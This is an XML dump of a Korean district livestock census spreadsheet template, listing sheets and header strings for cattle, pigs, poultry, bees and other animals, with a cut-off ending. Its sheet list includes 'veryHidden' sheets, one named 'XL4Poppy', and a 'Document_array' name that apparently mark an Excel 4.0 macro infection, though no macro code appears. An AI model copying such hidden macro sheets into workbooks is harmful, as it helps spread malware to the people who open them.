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Default Extension="vml" ContentType="application/vnd.openxmlformats-officedocument.vmlDrawing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65" windowWidth="6090" windowHeight="3315" tabRatio="925" firstSheet="2" activeTab="2"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" state="veryHidden" r:id="rId1"/>
    <sheet name="------" sheetId="2" state="veryHidden" r:id="rId2"/>
    <sheet name="총괄(주요가축)" sheetId="3" r:id="rId3"/>
    <sheet name="한육우1-1" sheetId="4" r:id="rId4"/>
    <sheet name="한육우1-2" sheetId="5" r:id="rId5"/>
    <sheet name="한육우1-3" sheetId="6" r:id="rId6"/>
    <sheet name="젖소2-1" sheetId="7" r:id="rId7"/>
    <sheet name="젖소2-2" sheetId="8" r:id="rId8"/>
    <sheet name="젖소2-3" sheetId="9" r:id="rId9"/>
    <sheet name="돼지3-1" sheetId="10" r:id="rId10"/>
    <sheet name="돼지3-2" sheetId="11" r:id="rId11"/>
    <sheet name="돼지3-3" sheetId="12" r:id="rId12"/>
    <sheet name="닭4-1" sheetId="13" r:id="rId13"/>
    <sheet name="닭4-2" sheetId="14" r:id="rId14"/>
    <sheet name="닭4-3" sheetId="15" r:id="rId15"/>
    <sheet name="오리5-1(호수)" sheetId="16" r:id="rId16"/>
    <sheet name="오리5-2(마리수)" sheetId="17" r:id="rId17"/>
    <sheet name="오리5-3(성별, 종별)" sheetId="18" r:id="rId18"/>
    <sheet name="말6-1" sheetId="19" r:id="rId19"/>
    <sheet name="말6-2" sheetId="20" r:id="rId20"/>
    <sheet name="염소(산양)7-1" sheetId="21" r:id="rId21"/>
    <sheet name="염소7-2" sheetId="22" r:id="rId22"/>
    <sheet name="염소7-3" sheetId="23" r:id="rId23"/>
    <sheet name="면양8-1" sheetId="24" r:id="rId24"/>
    <sheet name="면양8-2" sheetId="25" r:id="rId25"/>
    <sheet name="면양8-3" sheetId="26" r:id="rId26"/>
    <sheet name="사슴9-1" sheetId="27" r:id="rId27"/>
    <sheet name="사슴9-2" sheetId="28" r:id="rId28"/>
    <sheet name="토끼10-1(호수)" sheetId="29" r:id="rId29"/>
    <sheet name="토끼10-2(마리수)" sheetId="30" r:id="rId30"/>
    <sheet name="토끼10-3(성별, 종별)" sheetId="31" r:id="rId31"/>
    <sheet name="개11-1(호수, 마리수)" sheetId="32" r:id="rId32"/>
    <sheet name="개11-2(성별, 종별)" sheetId="33" r:id="rId33"/>
    <sheet name="칠면조12-1(호수, 마리수)" sheetId="34" r:id="rId34"/>
    <sheet name="칠면조12-2(연령별, 성별)" sheetId="35" r:id="rId35"/>
    <sheet name="거위13-1(호수, 마리수)" sheetId="36" r:id="rId36"/>
    <sheet name="거위13-2(연령별, 성별)" sheetId="37" r:id="rId37"/>
    <sheet name="메추리14-1(호수)" sheetId="38" r:id="rId38"/>
    <sheet name="메추리14-2(마리수)" sheetId="39" r:id="rId39"/>
    <sheet name="메추리14-3(연령별, 성별)" sheetId="40" r:id="rId40"/>
    <sheet name="꿀벌15-1(호수, 군수)" sheetId="41" r:id="rId41"/>
    <sheet name="꿀벌15-2(사육형태별)" sheetId="42" r:id="rId42"/>
    <sheet name="관상조16-1(호수, 마리수)" sheetId="43" r:id="rId43"/>
    <sheet name="관상조16-2(부업별)" sheetId="44" r:id="rId44"/>
    <sheet name="관상조16-3(전업별)" sheetId="45" r:id="rId45"/>
    <sheet name="관상조16-4(전체)" sheetId="46" r:id="rId46"/>
    <sheet name="타조17-1(호수, 마리수)" sheetId="47" r:id="rId47"/>
    <sheet name="타조17-2(연령별, 성별)" sheetId="48" r:id="rId48"/>
    <sheet name="오소리18-1(호수)" sheetId="49" r:id="rId49"/>
    <sheet name="오소리18-2(마리수)" sheetId="50" r:id="rId50"/>
    <sheet name="오소리18-3(성별, 종별)" sheetId="51" r:id="rId51"/>
    <sheet name="꿩19-1(호수)" sheetId="52" r:id="rId52"/>
    <sheet name="꿩19-2(마리수)" sheetId="53" r:id="rId53"/>
    <sheet name="꿩19-3(연령별, 성별)" sheetId="54" r:id="rId54"/>
    <sheet name="지렁이20" sheetId="55" r:id="rId55"/>
    <sheet name="기러기21-1(호수)" sheetId="56" r:id="rId56"/>
    <sheet name="기러기21-2(마리수)" sheetId="57" r:id="rId57"/>
    <sheet name="기러기21-3(연령별, 성별)" sheetId="58" r:id="rId58"/>
    <sheet name="--------" sheetId="59" state="veryHidden" r:id="rId59"/>
    <sheet name="XL4Poppy" sheetId="60" state="veryHidden" r:id="rId60"/>
  </sheets>
  <definedNames>
    <definedName name="Document_array" localSheetId="59">{"Book1","F46A7EA539AF4c6c838295780D6A58A1.xls"}</definedName>
    <definedName name="Document_array" localSheetId="2">{"Book1"}</definedName>
    <definedName name="Document_array">{"Book1"}</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="42">'관상조16-1(호수, 마리수)'!$A$1:$Q$16</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="40">'꿀벌15-1(호수, 군수)'!$A$1:$S$16</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="37">'메추리14-1(호수)'!$A$1:$L$15</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="27">'사슴9-2'!$A$1:$P$17</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="17">'오리5-3(성별, 종별)'!$A$1:$N$17</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="47">'타조17-2(연령별, 성별)'!$A$1:$Q$17</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="29">'토끼10-2(마리수)'!$A$1:$N$16</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="30">'토끼10-3(성별, 종별)'!$A$1:$R$17</definedName>
    <definedName name="기본급테이블">#REF!</definedName>
    <definedName name="사원테이블">#REF!</definedName>
    <definedName name="수당테이블">#REF!</definedName>
    <definedName name="직책테이블">#REF!</definedName>
  </definedNames>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/comments33.xml><?xml version="1.0" encoding="utf-8"?>
<comments xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <authors>
    <author>user</author>
  </authors>
  <commentList>
    <comment ref="O3" authorId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <rFont val="돋움"/>
            <family val="3"/>
          </rPr>
          <t>항목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추가</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1780" uniqueCount="457">
  <si>
    <t>합계</t>
  </si>
  <si>
    <t>10~19</t>
  </si>
  <si>
    <t>20~29</t>
  </si>
  <si>
    <t>30~49</t>
  </si>
  <si>
    <t>50~99</t>
  </si>
  <si>
    <t>100~299</t>
  </si>
  <si>
    <t>300~499</t>
  </si>
  <si>
    <t>500~999</t>
  </si>
  <si>
    <t>1000이상</t>
  </si>
  <si>
    <t>연령별 성별 마리수</t>
  </si>
  <si>
    <t>계</t>
  </si>
  <si>
    <t>1세미만</t>
  </si>
  <si>
    <t>암</t>
  </si>
  <si>
    <t>수</t>
  </si>
  <si>
    <t>소계</t>
  </si>
  <si>
    <t>사육가구수</t>
  </si>
  <si>
    <t>사육마리수</t>
  </si>
  <si>
    <t>1~9</t>
  </si>
  <si>
    <t>10~49</t>
  </si>
  <si>
    <t>100~199</t>
  </si>
  <si>
    <t>200~299</t>
  </si>
  <si>
    <t>500이상</t>
  </si>
  <si>
    <t>연령별 ·성별 마리수</t>
  </si>
  <si>
    <t>1~99</t>
  </si>
  <si>
    <t>사육규모별 마리수</t>
  </si>
  <si>
    <t>100~200</t>
  </si>
  <si>
    <t>200~500</t>
  </si>
  <si>
    <t>500~1000</t>
  </si>
  <si>
    <t>1000~3000</t>
  </si>
  <si>
    <t>3000~5000</t>
  </si>
  <si>
    <t>5000~10000</t>
  </si>
  <si>
    <t>10000이상</t>
  </si>
  <si>
    <t>규 모 별    마 리 수</t>
  </si>
  <si>
    <t>1~9</t>
  </si>
  <si>
    <t>3년 이상</t>
  </si>
  <si>
    <t>아메리칸 블랙종</t>
  </si>
  <si>
    <t>붉은 목종</t>
  </si>
  <si>
    <t>푸른목종</t>
  </si>
  <si>
    <t>계</t>
  </si>
  <si>
    <t>종별 마리수</t>
  </si>
  <si>
    <t>암</t>
  </si>
  <si>
    <t>수</t>
  </si>
  <si>
    <t>참오소리</t>
  </si>
  <si>
    <t>돼지코 오소리</t>
  </si>
  <si>
    <t>교잡종</t>
  </si>
  <si>
    <t>5개월 미만</t>
  </si>
  <si>
    <t>5개월~12개월미만</t>
  </si>
  <si>
    <t>12개월 미만</t>
  </si>
  <si>
    <t>1년~3년 미만</t>
  </si>
  <si>
    <t>20-29</t>
  </si>
  <si>
    <t>30-39</t>
  </si>
  <si>
    <t>40-49</t>
  </si>
  <si>
    <t>50-99</t>
  </si>
  <si>
    <t>100-199</t>
  </si>
  <si>
    <t>200-299</t>
  </si>
  <si>
    <t>300-399</t>
  </si>
  <si>
    <t>400-499</t>
  </si>
  <si>
    <t>1-9마리</t>
  </si>
  <si>
    <t>10-19</t>
  </si>
  <si>
    <t>1세 미만</t>
  </si>
  <si>
    <t>품종별</t>
  </si>
  <si>
    <t>1-4마리</t>
  </si>
  <si>
    <t>5-9</t>
  </si>
  <si>
    <t>30-49</t>
  </si>
  <si>
    <t>100-299</t>
  </si>
  <si>
    <t>300-499</t>
  </si>
  <si>
    <t>500-999</t>
  </si>
  <si>
    <t>5000-9999</t>
  </si>
  <si>
    <t>10000이상</t>
  </si>
  <si>
    <t>200000
이상</t>
  </si>
  <si>
    <t>50000
-99999</t>
  </si>
  <si>
    <t>40000
-49999</t>
  </si>
  <si>
    <t>30000
-39999</t>
  </si>
  <si>
    <t>20000
-29999</t>
  </si>
  <si>
    <t>10000
-19999</t>
  </si>
  <si>
    <t>5000
-9999</t>
  </si>
  <si>
    <t>1000
-1999</t>
  </si>
  <si>
    <t>500
-999</t>
  </si>
  <si>
    <t>1-499
마리</t>
  </si>
  <si>
    <t>2000
-2999</t>
  </si>
  <si>
    <t>3000
-4999</t>
  </si>
  <si>
    <t>연령별.성별 마리수</t>
  </si>
  <si>
    <t>종별마리수</t>
  </si>
  <si>
    <t>1,000이상</t>
  </si>
  <si>
    <t>연령별.성별마리수</t>
  </si>
  <si>
    <t>1세 이상</t>
  </si>
  <si>
    <t>1-2세</t>
  </si>
  <si>
    <t>2세이상</t>
  </si>
  <si>
    <t>20~39</t>
  </si>
  <si>
    <t>40~49</t>
  </si>
  <si>
    <t>300~399</t>
  </si>
  <si>
    <t>400~499</t>
  </si>
  <si>
    <t>1,000~1999</t>
  </si>
  <si>
    <t>2,000이상</t>
  </si>
  <si>
    <t>6개월미만</t>
  </si>
  <si>
    <t>6개월이상</t>
  </si>
  <si>
    <t>모용종</t>
  </si>
  <si>
    <t>모피용종</t>
  </si>
  <si>
    <t>육용종</t>
  </si>
  <si>
    <t>기타</t>
  </si>
  <si>
    <t>친치라</t>
  </si>
  <si>
    <t>렉스</t>
  </si>
  <si>
    <t>규모별 마리수</t>
  </si>
  <si>
    <t>1~4</t>
  </si>
  <si>
    <t>5~9</t>
  </si>
  <si>
    <t>100이상</t>
  </si>
  <si>
    <t>종별 마리수</t>
  </si>
  <si>
    <t>18개월미만</t>
  </si>
  <si>
    <t>18개월이상</t>
  </si>
  <si>
    <t>진도개</t>
  </si>
  <si>
    <t>1~19</t>
  </si>
  <si>
    <t>20~49</t>
  </si>
  <si>
    <t>50~199</t>
  </si>
  <si>
    <t>200~499</t>
  </si>
  <si>
    <t>1000~1499</t>
  </si>
  <si>
    <t>1500~1999</t>
  </si>
  <si>
    <t>2000~2999</t>
  </si>
  <si>
    <t>3000~4999</t>
  </si>
  <si>
    <t>5000~9999</t>
  </si>
  <si>
    <t>10000~29999</t>
  </si>
  <si>
    <t>30000~49999</t>
  </si>
  <si>
    <t>50000이상</t>
  </si>
  <si>
    <t>산란종</t>
  </si>
  <si>
    <t>6개월~12개월미만</t>
  </si>
  <si>
    <t>12개월이상</t>
  </si>
  <si>
    <t>100~499</t>
  </si>
  <si>
    <t>1000~9999</t>
  </si>
  <si>
    <t>10000~19999</t>
  </si>
  <si>
    <t>20000~29999</t>
  </si>
  <si>
    <t>30000~39999</t>
  </si>
  <si>
    <t>40000~49999</t>
  </si>
  <si>
    <t>50000~99999</t>
  </si>
  <si>
    <t>100000이상</t>
  </si>
  <si>
    <t>초생추(35일 미만)</t>
  </si>
  <si>
    <t>어미(35일 이상)</t>
  </si>
  <si>
    <t>사육군수</t>
  </si>
  <si>
    <t>종별 가구수 및 군수</t>
  </si>
  <si>
    <t>개량종중 사육형태별 호수 및 군수</t>
  </si>
  <si>
    <t>재래종</t>
  </si>
  <si>
    <t>개량종</t>
  </si>
  <si>
    <t>고정양봉</t>
  </si>
  <si>
    <t>이동양봉</t>
  </si>
  <si>
    <t>호수</t>
  </si>
  <si>
    <t>군수</t>
  </si>
  <si>
    <t>사 육 가 구 수</t>
  </si>
  <si>
    <t>사 육 수 수</t>
  </si>
  <si>
    <t>1000~1999</t>
  </si>
  <si>
    <t>5000이상</t>
  </si>
  <si>
    <t>부 업</t>
  </si>
  <si>
    <t>수수</t>
  </si>
  <si>
    <t>사육규모별 가구수</t>
  </si>
  <si>
    <t>규모별 마리수</t>
  </si>
  <si>
    <t>연령별 ·성별 마리수</t>
  </si>
  <si>
    <t>사육규모별 마리수</t>
  </si>
  <si>
    <t>읍면동</t>
  </si>
  <si>
    <t>합계</t>
  </si>
  <si>
    <t>1세 미만</t>
  </si>
  <si>
    <t>1-2세</t>
  </si>
  <si>
    <t>2세이상</t>
  </si>
  <si>
    <t>품종별</t>
  </si>
  <si>
    <t>계</t>
  </si>
  <si>
    <t>암</t>
  </si>
  <si>
    <t>수</t>
  </si>
  <si>
    <t>한우</t>
  </si>
  <si>
    <t>육우</t>
  </si>
  <si>
    <t>기타</t>
  </si>
  <si>
    <t>1-4마리</t>
  </si>
  <si>
    <t>5-9</t>
  </si>
  <si>
    <t>10-19</t>
  </si>
  <si>
    <t>20-29</t>
  </si>
  <si>
    <t>30-49</t>
  </si>
  <si>
    <t>50-99</t>
  </si>
  <si>
    <t>100-299</t>
  </si>
  <si>
    <t>300-499</t>
  </si>
  <si>
    <t>500-999</t>
  </si>
  <si>
    <t>5000-9999</t>
  </si>
  <si>
    <t>10000이상</t>
  </si>
  <si>
    <t>시군별</t>
  </si>
  <si>
    <t>시군별</t>
  </si>
  <si>
    <t>시군별</t>
  </si>
  <si>
    <t>시군별</t>
  </si>
  <si>
    <t>시군별</t>
  </si>
  <si>
    <t>시군별</t>
  </si>
  <si>
    <t>시군별</t>
  </si>
  <si>
    <t>합계</t>
  </si>
  <si>
    <t>합계</t>
  </si>
  <si>
    <t>2개월
미만</t>
  </si>
  <si>
    <t>2-3
개월령</t>
  </si>
  <si>
    <t>4-6
개월령</t>
  </si>
  <si>
    <t>7-8개월령</t>
  </si>
  <si>
    <t>8개월령 이상</t>
  </si>
  <si>
    <t>소계</t>
  </si>
  <si>
    <t>수컷</t>
  </si>
  <si>
    <t>암컷</t>
  </si>
  <si>
    <t>암컷중모돈용</t>
  </si>
  <si>
    <t>1-499
마리</t>
  </si>
  <si>
    <t>500
-999</t>
  </si>
  <si>
    <t>1000
-1999</t>
  </si>
  <si>
    <t>2000
-2999</t>
  </si>
  <si>
    <t>3000
-4999</t>
  </si>
  <si>
    <t>5000
-9999</t>
  </si>
  <si>
    <t>10000
-19999</t>
  </si>
  <si>
    <t>20000
-29999</t>
  </si>
  <si>
    <t>30000
-39999</t>
  </si>
  <si>
    <t>40000
-49999</t>
  </si>
  <si>
    <t>50000
-99999</t>
  </si>
  <si>
    <t>100000
-199999</t>
  </si>
  <si>
    <t>200000
이상</t>
  </si>
  <si>
    <t>시군별</t>
  </si>
  <si>
    <t>사육가구수</t>
  </si>
  <si>
    <t>사육마리수</t>
  </si>
  <si>
    <t>계</t>
  </si>
  <si>
    <t>1-4</t>
  </si>
  <si>
    <t>5-9</t>
  </si>
  <si>
    <t>10-19</t>
  </si>
  <si>
    <t>20-39</t>
  </si>
  <si>
    <t>40-49</t>
  </si>
  <si>
    <t>50-99</t>
  </si>
  <si>
    <t>100이상</t>
  </si>
  <si>
    <t>시군별</t>
  </si>
  <si>
    <t>연령별.성별 마리수</t>
  </si>
  <si>
    <t>종별마리수</t>
  </si>
  <si>
    <t>계</t>
  </si>
  <si>
    <t>3세미만</t>
  </si>
  <si>
    <t>3세이상</t>
  </si>
  <si>
    <t>합계</t>
  </si>
  <si>
    <t>말</t>
  </si>
  <si>
    <t>당나귀</t>
  </si>
  <si>
    <t>노새</t>
  </si>
  <si>
    <t>암</t>
  </si>
  <si>
    <t>수</t>
  </si>
  <si>
    <t>개량종</t>
  </si>
  <si>
    <t>재래종</t>
  </si>
  <si>
    <t>1-4마리</t>
  </si>
  <si>
    <t>30-49</t>
  </si>
  <si>
    <t>100-299</t>
  </si>
  <si>
    <t>300-499</t>
  </si>
  <si>
    <t>500-999</t>
  </si>
  <si>
    <t>1,000이상</t>
  </si>
  <si>
    <t>연령별.성별마리수</t>
  </si>
  <si>
    <t>종별마리수</t>
  </si>
  <si>
    <t>계</t>
  </si>
  <si>
    <t>1세 이상</t>
  </si>
  <si>
    <t>유산양</t>
  </si>
  <si>
    <t>모용종</t>
  </si>
  <si>
    <t>육용종
(잡종)</t>
  </si>
  <si>
    <t>1-9</t>
  </si>
  <si>
    <t>10-49</t>
  </si>
  <si>
    <t>50-99</t>
  </si>
  <si>
    <t>100
-199</t>
  </si>
  <si>
    <t>200
-299</t>
  </si>
  <si>
    <t>300
-499</t>
  </si>
  <si>
    <t>500
이상</t>
  </si>
  <si>
    <t>18개월 미만</t>
  </si>
  <si>
    <t>18개월 이상</t>
  </si>
  <si>
    <t>꽃사슴</t>
  </si>
  <si>
    <t>레드디어</t>
  </si>
  <si>
    <t>엘크</t>
  </si>
  <si>
    <t>순록</t>
  </si>
  <si>
    <t>기타</t>
  </si>
  <si>
    <t>시군별</t>
  </si>
  <si>
    <t>사육 가구수</t>
  </si>
  <si>
    <t>십자매</t>
  </si>
  <si>
    <t>비들기</t>
  </si>
  <si>
    <t>잉꼬</t>
  </si>
  <si>
    <t>금화조</t>
  </si>
  <si>
    <t>문조</t>
  </si>
  <si>
    <t>카나리아</t>
  </si>
  <si>
    <t>모란앵무</t>
  </si>
  <si>
    <t>기타</t>
  </si>
  <si>
    <t>전체</t>
  </si>
  <si>
    <t>전 업</t>
  </si>
  <si>
    <t>비둘기</t>
  </si>
  <si>
    <t>500~999</t>
  </si>
  <si>
    <t>'05.12 행정통계서식.xls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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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농진청자료송부.xls</t>
  </si>
  <si>
    <t>계</t>
  </si>
  <si>
    <t>목포</t>
  </si>
  <si>
    <t>여수</t>
  </si>
  <si>
    <t>순천</t>
  </si>
  <si>
    <t>1년이상</t>
  </si>
  <si>
    <t>시군별</t>
  </si>
  <si>
    <t>1~599</t>
  </si>
  <si>
    <t>600~999</t>
  </si>
  <si>
    <t>600~999</t>
  </si>
  <si>
    <t>1000~1999</t>
  </si>
  <si>
    <t>3000이상</t>
  </si>
  <si>
    <t>2000~2999</t>
  </si>
  <si>
    <t>면  적(㎡)</t>
  </si>
  <si>
    <t>(1-1) 한(육)우 사육규모별 가구수</t>
  </si>
  <si>
    <t>숫컷</t>
  </si>
  <si>
    <t>23 지렁이 규모별 가구수 및 면적</t>
  </si>
  <si>
    <t>22-3. 꿩 연령별 성별 마리수</t>
  </si>
  <si>
    <t>22-2. 꿩 사육규모별 마리수</t>
  </si>
  <si>
    <t>(4-2) 닭 사육규모별 마리수</t>
  </si>
  <si>
    <t>(4-1) 닭 사육규모별 가구수</t>
  </si>
  <si>
    <t>(3-3) 돼지 월령별.성별 마리수</t>
  </si>
  <si>
    <t>(3-2) 돼지 사육규모별 마리수</t>
  </si>
  <si>
    <t>(3-1) 돼지 사육규모별 가구수</t>
  </si>
  <si>
    <t>(2-3) 젖소 연령별.성별 마리수</t>
  </si>
  <si>
    <t>(2-2) 젖소 사육규모별 마리수</t>
  </si>
  <si>
    <t>(2-1) 젖소 사육규모별 가구수</t>
  </si>
  <si>
    <t>(1-3) 한(육)우 연령별.성별.품종별 마리수</t>
  </si>
  <si>
    <t>(1-2) 한(육)우 사육규모별 마리수</t>
  </si>
  <si>
    <t>F46A7EA539AF4c6c838295780D6A58A1.xls</t>
  </si>
  <si>
    <t>Book1</t>
  </si>
  <si>
    <t>농가수</t>
  </si>
  <si>
    <t>마리수</t>
  </si>
  <si>
    <t>애완종</t>
  </si>
  <si>
    <t>1000-1999</t>
  </si>
  <si>
    <t>2000-4999</t>
  </si>
  <si>
    <t>1000-1999</t>
  </si>
  <si>
    <t>2000-4999</t>
  </si>
  <si>
    <t>(단위 : 가구)</t>
  </si>
  <si>
    <t>(단위 : 마리)</t>
  </si>
  <si>
    <t>(단위 : 가구)</t>
  </si>
  <si>
    <t>(단위 : 마리)</t>
  </si>
  <si>
    <t>(단위 : 마리, 호)</t>
  </si>
  <si>
    <t>(단위:가구,마리)</t>
  </si>
  <si>
    <t>(단위 : 가구)</t>
  </si>
  <si>
    <t>(단위 : 마리)</t>
  </si>
  <si>
    <t>(단위 : 가구,마리)</t>
  </si>
  <si>
    <t>(단위 : 가구)</t>
  </si>
  <si>
    <t>(단위 : 가구,마리)</t>
  </si>
  <si>
    <t>(단위 : 가구,군수)</t>
  </si>
  <si>
    <t>(단위 : 가구,두수)</t>
  </si>
  <si>
    <t>(단위 : 가구,면적)</t>
  </si>
  <si>
    <t>(단위:가구,마리)</t>
  </si>
  <si>
    <t>(4-3) 닭 연령별.용도별 마리수</t>
  </si>
  <si>
    <t>(단위 : 마리,호)</t>
  </si>
  <si>
    <t>시군별</t>
  </si>
  <si>
    <t>월령별</t>
  </si>
  <si>
    <t>용도별</t>
  </si>
  <si>
    <t>용도별 합계</t>
  </si>
  <si>
    <t>합계</t>
  </si>
  <si>
    <t>3개월미만</t>
  </si>
  <si>
    <t>3-6개월</t>
  </si>
  <si>
    <t>6개월이상</t>
  </si>
  <si>
    <t>종계</t>
  </si>
  <si>
    <t>산란계</t>
  </si>
  <si>
    <t>육용계</t>
  </si>
  <si>
    <t>겸용계</t>
  </si>
  <si>
    <t>용도별
총마리수</t>
  </si>
  <si>
    <t>용도별
총 농가수</t>
  </si>
  <si>
    <t>농가수</t>
  </si>
  <si>
    <t>마리수</t>
  </si>
  <si>
    <t>30000-39999(마리)</t>
  </si>
  <si>
    <t>50000-
99999(마리)</t>
  </si>
  <si>
    <t>계</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color indexed="30"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>자료 작성시 유의사항 :</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color indexed="10"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>각 축종 시트별로 서식 계산칸 강제입력 불가 및 축종별 시트 앞,뒤,맨 오른쪽 총 합계,소계 등 숫자          일치 여부 확인 후 제출 ,특히, 돼지3-3시트 7-8개월령 소계란 수치 확인 및 (소계란에 암컷중 모돈용 수치 계산 제외) 
닭4-3시트 용도별 합계의 총 마리수·농가수 합계가 옆 시트와 동일한지 확인)</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color indexed="10"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>, 구 서식 사용불가(첨부 서식 사용 바람).</t>
    </r>
  </si>
  <si>
    <t>○ 몇몇 시군에서 읍면별로 자료 넘겨주시는데 취합에 어려움이 있으니 
    시군 총괄로 작성 후 제출 바랍니다.
  * 자동 계산되는 부분 수기 입력 절대 금지</t>
  </si>
  <si>
    <t>1~9</t>
  </si>
  <si>
    <t>10~49</t>
  </si>
  <si>
    <t>50~99</t>
  </si>
  <si>
    <t>100~199</t>
  </si>
  <si>
    <t>200~299</t>
  </si>
  <si>
    <t>300~499</t>
  </si>
  <si>
    <t>500 이상</t>
  </si>
  <si>
    <t>6개월 미만</t>
  </si>
  <si>
    <t>암</t>
  </si>
  <si>
    <t>6개월~12개월미만</t>
  </si>
  <si>
    <t>12개월 이상</t>
  </si>
  <si>
    <t>항목 추가되었음</t>
  </si>
  <si>
    <t>사육 목적별 마리수</t>
  </si>
  <si>
    <t>기타</t>
  </si>
  <si>
    <t>반려</t>
  </si>
  <si>
    <t>특수목적
(방범·경비, 
안내 등)</t>
  </si>
  <si>
    <t>24-3. 기러기 연령별 성별 마리수</t>
  </si>
  <si>
    <t>24-2. 기러기 사육규모별 마리수</t>
  </si>
  <si>
    <t>24-1. 기러기 사육규모별 가구수</t>
  </si>
  <si>
    <t>재래산양
(잡종)</t>
  </si>
  <si>
    <t>곡성읍</t>
  </si>
  <si>
    <t>오곡면</t>
  </si>
  <si>
    <t>삼기면</t>
  </si>
  <si>
    <t>석곡면</t>
  </si>
  <si>
    <t>목사동면</t>
  </si>
  <si>
    <t>죽곡면</t>
  </si>
  <si>
    <t>고달면</t>
  </si>
  <si>
    <t>옥과면</t>
  </si>
  <si>
    <t>입면</t>
  </si>
  <si>
    <t>겸면</t>
  </si>
  <si>
    <t>오산면</t>
  </si>
  <si>
    <t>5-1 오리 사육규모별 가구수</t>
  </si>
  <si>
    <t>5-2 오리 사육규모별 마리수</t>
  </si>
  <si>
    <t>5-3 오리 연령별 성별 종별 마리수</t>
  </si>
  <si>
    <r>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>6</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>-1) 말 사육규모별 가구수 및 마리수</t>
    </r>
  </si>
  <si>
    <r>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>6</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>-2) 말 연령별.성별.종별 마리수</t>
    </r>
  </si>
  <si>
    <t>(7-1) 염소(산양) 사육규모별 가구수</t>
  </si>
  <si>
    <t>(7-2) 염소(산양) 사육규모별 마리수</t>
  </si>
  <si>
    <t>(7-3) 염소(산양) 연령별.성별.종별 마리수</t>
  </si>
  <si>
    <t>(8-1) 면양 사육규모별 가구수</t>
  </si>
  <si>
    <r>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>8</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>-2) 면양 사육규모별 마리수</t>
    </r>
  </si>
  <si>
    <r>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>8</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>-3) 면양 연령별.성별.종별 마리수</t>
    </r>
  </si>
  <si>
    <r>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>9</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>-1) 사슴 사육규모별 가구수 및 마리수</t>
    </r>
  </si>
  <si>
    <r>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>9</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="바탕체"/>
        <family val="1"/>
      </rPr>
      <t>-2) 사슴 연령별.성별.종별 마리수</t>
    </r>
  </si>
  <si>
    <t>10-1 토끼 사육규모별 가구수</t>
  </si>
  <si>
    <t>10-2 토끼사육 규모별 마리수</t>
  </si>
  <si>
    <t>10-3 토끼 연령별 성별 종별 마리수</t>
  </si>
  <si>
    <t>11-1 개 규모별 사육가구수 및 마리수</t>
  </si>
  <si>
    <t>11-2 개 연령별 성별 종별 사육목적별 마리수</t>
  </si>
  <si>
    <t>12-1 칠면조 사육규모별 가구수 및 마리수</t>
  </si>
  <si>
    <t>12-2 칠면조 연령별 성별 마리수</t>
  </si>
  <si>
    <t>13-1 거위 사육규모별 가구수 및 마리수</t>
  </si>
  <si>
    <t>13-2 거위 연령별 성별 마리수</t>
  </si>
  <si>
    <t>14-1 메추리 사육규모별 가구수</t>
  </si>
  <si>
    <t>14-2 메추리사육규모별 마리수</t>
  </si>
  <si>
    <t>14-3 메추리 연령별 성별 마리수</t>
  </si>
  <si>
    <t>15-1 꿀벌 사육규별 가구수 및 군수</t>
  </si>
  <si>
    <t>15-2 꿀벌 종별 사육형태별 가구수 및 군수</t>
  </si>
  <si>
    <t>16-1. 관상조 사육규모별 가구수 및 두수</t>
  </si>
  <si>
    <t>16-2. 부업규모 가구수 및 품목별 마리수</t>
  </si>
  <si>
    <t>16-3. 전업규모 가구수 및 품목별 마리수</t>
  </si>
  <si>
